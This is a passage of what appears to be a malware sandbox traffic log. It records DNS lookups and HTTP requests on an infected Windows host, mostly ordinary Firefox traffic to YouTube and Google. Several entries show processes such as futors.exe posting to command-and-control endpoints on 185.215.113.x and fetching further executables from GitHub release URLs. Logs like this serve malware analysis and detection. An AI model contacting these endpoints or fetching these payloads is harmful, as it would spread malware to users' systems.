                                                                                              216.58.212.238
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.187.238
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              216.58.201.110
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              172.217.169.46
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.200.46
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              216.58.204.78
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.179.238
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.200.14
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.180.14
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              172.217.169.14
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.178.14
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              172.217.16.238
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.187.206
                                                                                            • flag-us
                                                                                              DNS
                                                                                              youtube-ui.l.google.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              216.58.201.110
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              216.58.213.14
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.187.206
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              172.217.16.238
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.178.14
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              172.217.169.14
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              216.58.204.78
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.179.238
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.200.46
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.187.238
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              216.58.212.238
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              172.217.169.46
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.200.14
                                                                                              youtube-ui.l.google.com
                                                                                              IN A
                                                                                              142.250.180.14
                                                                                            • flag-us
                                                                                              DNS
                                                                                              youtube-ui.l.google.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              youtube-ui.l.google.com
                                                                                              IN AAAA
                                                                                              Response
                                                                                              youtube-ui.l.google.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:81e::200e
                                                                                              youtube-ui.l.google.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:820::200e
                                                                                              youtube-ui.l.google.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:81f::200e
                                                                                              youtube-ui.l.google.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:81d::200e
                                                                                            • flag-us
                                                                                              DNS
                                                                                              consent.youtube.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              consent.youtube.com
                                                                                              IN A
                                                                                              Response
                                                                                              consent.youtube.com
                                                                                              IN A
                                                                                              216.58.201.110
                                                                                            • flag-us
                                                                                              DNS
                                                                                              firefox-api-proxy.cdn.mozilla.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              firefox-api-proxy.cdn.mozilla.net
                                                                                              IN A
                                                                                              Response
                                                                                              firefox-api-proxy.cdn.mozilla.net
                                                                                              IN CNAME
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              IN A
                                                                                              34.149.97.1
                                                                                            • flag-us
                                                                                              DNS
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              IN A
                                                                                              Response
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              IN A
                                                                                              34.149.97.1
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              216.58.201.110:443
                                                                                              Request
                                                                                              GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                                                                                              host: consent.youtube.com
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                                                                              accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              accept-language: en-US,en;q=0.5
                                                                                              accept-encoding: gzip, deflate, br
                                                                                              cookie: SOCS=CAAaBgiA4dm9Bg
                                                                                              cookie: YSC=s9JvWG0MbYo
                                                                                              cookie: __Secure-YEC=CgtpRHN6UWJPeEdyWSiC8dm9BjIKCgJHQhIEGgAgDA%3D%3D
                                                                                              cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgDA%3D%3D
                                                                                              upgrade-insecure-requests: 1
                                                                                              sec-fetch-dest: document
                                                                                              sec-fetch-mode: navigate
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-user: ?1
                                                                                              te: trailers
                                                                                            • flag-us
                                                                                              DNS
                                                                                              consent.youtube.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              consent.youtube.com
                                                                                              IN A
                                                                                              Response
                                                                                              consent.youtube.com
                                                                                              IN A
                                                                                              216.58.201.110
                                                                                            • flag-us
                                                                                              DNS
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              IN AAAA
                                                                                              Response
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              IN AAAA
                                                                                              2600:1901:0:74e4::
                                                                                            • flag-us
                                                                                              DNS
                                                                                              consent.youtube.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              consent.youtube.com
                                                                                              IN AAAA
                                                                                              Response
                                                                                              consent.youtube.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:826::200e
                                                                                            • flag-us
                                                                                              DNS
                                                                                              www.google.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              www.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              www.google.com
                                                                                              IN A
                                                                                              142.250.200.4
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/favicon.ico
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /favicon.ico HTTP/2.0
                                                                                              host: www.google.com
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                                                                              accept: image/avif,image/webp,*/*
                                                                                              accept-language: en-US,en;q=0.5
                                                                                              accept-encoding: gzip, deflate, br
                                                                                              referer: https://consent.youtube.com/
                                                                                              sec-fetch-dest: image
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-site: cross-site
                                                                                              te: trailers
                                                                                            • flag-us
                                                                                              DNS
                                                                                              www.google.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              www.google.com
                                                                                              IN AAAA
                                                                                              Response
                                                                                              www.google.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:822::2004
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 4
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:10 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 158
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:12 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:22 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:27 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:45 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:49 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:58 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----AEBAKJDGHIIJJKFHCFCA
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 363
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:13 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-us
                                                                                              DNS
                                                                                              github.com
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              github.com
                                                                                              IN A
                                                                                              Response
                                                                                              github.com
                                                                                              IN A
                                                                                              20.26.156.215
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              20.26.156.215:443
                                                                                              Request
                                                                                              GET /legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe HTTP/1.1
                                                                                              Host: github.com
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Server: GitHub.com
                                                                                              Date: Thu, 20 Feb 2025 00:34:17 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/931090743/fe2351f3-d512-4704-a31e-e7267ddf3e14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003417Z&X-Amz-Expires=300&X-Amz-Signature=66a4490c649969e8e57e49179dcb3d281f5845caaa83cbf7476823ad7406f82a&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dtrano1221.exe&response-content-type=application%2Foctet-stream
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                                                              Content-Length: 0
                                                                                              X-GitHub-Request-Id: 5849:28646A:403531:50375F:67B67888
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://github.com/legendary99999/fdsfsdfdsfds/releases/download/dfsfdsfdsdsf/con12312211221.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              20.26.156.215:443
                                                                                              Request
                                                                                              GET /legendary99999/fdsfsdfdsfds/releases/download/dfsfdsfdsdsf/con12312211221.exe HTTP/1.1
                                                                                              Host: github.com
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Server: GitHub.com
                                                                                              Date: Thu, 20 Feb 2025 00:34:27 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/932430920/f3727065-e97b-4230-9333-63b156bde389?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003427Z&X-Amz-Expires=300&X-Amz-Signature=d0a095dda97f3ae2552aa4991862c4e6a4469581f8b8e7c7c9530a03e2528eb7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dcon12312211221.exe&response-content-type=application%2Foctet-stream
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                                                              Content-Length: 0
                                                                                              X-GitHub-Request-Id: 5849:28646A:403960:503CE6:67B67889
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://github.com/legendary99999/saffsfsd/releases/download/dsffdssff/12321321.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              20.26.156.215:443
                                                                                              Request
                                                                                              GET /legendary99999/saffsfsd/releases/download/dsffdssff/12321321.exe HTTP/1.1
                                                                                              Host: github.com
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Server: GitHub.com
                                                                                              Date: Thu, 20 Feb 2025 00:34:35 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/933717859/3158e964-6e73-4443-84f8-ddb304d57b87?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003435Z&X-Amz-Expires=300&X-Amz-Signature=f77e2f934b6db0dcdfdf9419e052f8c8ed4bdaf93aca348f73976eb1a93e252c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D12321321.exe&response-content-type=application%2Foctet-stream
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; 